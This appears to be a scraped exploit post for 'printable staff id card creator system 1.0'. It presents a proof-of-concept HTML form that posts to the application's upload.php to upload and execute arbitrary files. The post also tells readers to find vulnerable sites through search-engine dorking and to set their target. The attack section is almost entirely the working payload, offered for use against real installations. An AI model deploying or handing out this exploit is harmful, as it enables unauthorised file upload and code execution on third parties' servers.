.png)
2 months ago
34 BOOK THIS SPACE FOR AD
ARTICLE AD
## https://sploitus.com/exploit?id=PACKETSTORM:181441
=============================================================================================================================================
| # Title : printable staff id card creator system 1.0 idor Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.campcodes.com/downloads/printable-staff-id-card-creator-system-source-code/?wpdmdl=6749&refresh=66bbc00367bf91723580419 |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Insecure direct object reference: Suffering from an insecure direct object reference that allows users to upload and execute remote files. .
[+] Line : 8 Set your Target
[+] Save As poc.html
[+] payload :
<<div class="modal-content" style="font-size: 14px; font-family: Times New Roman;color:black;">
<div class="modal-header" style="background:#222d32">
<button type="button" class="close" data-dismiss="modal">×</button>
<h4 class="modal-title" style="font-weight: bold;color: #F0F0F0"><center>
SYSTEM INFORMATION INITIALISATION
</center></h4>
</div>
<form method="post" action="http://127.0.0.1/Staff_registration/upload.php" enctype="multipart/form-data">
<div class="modal-body">
<center>
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;"> Org Name:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgname"></span></p>
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;"> Phone:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgphone"></span></p>
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;"> Email:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgemail"></span></p>
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;"> Website:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgwebsite"></span></p>
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">Active Year:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgyear"></span></p>
Attach Organisation Logo:(<h7 style="color:red">Make sure it is a transparent image</h7>)<input name="filed" type="file" id="filed">
<input type="hidden" name="page" value="admin.php">
</center>
</div>
<div class="modal-footer">
<input type="submit" class="btn btn-success" value="Finish" id="addmember" name="orginitial">
<button type="button" class="btn btn-success" data-dismiss="modal">Close</button>
</div>
</form></div>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
Bengali (Bangladesh) · 
English (United States) ·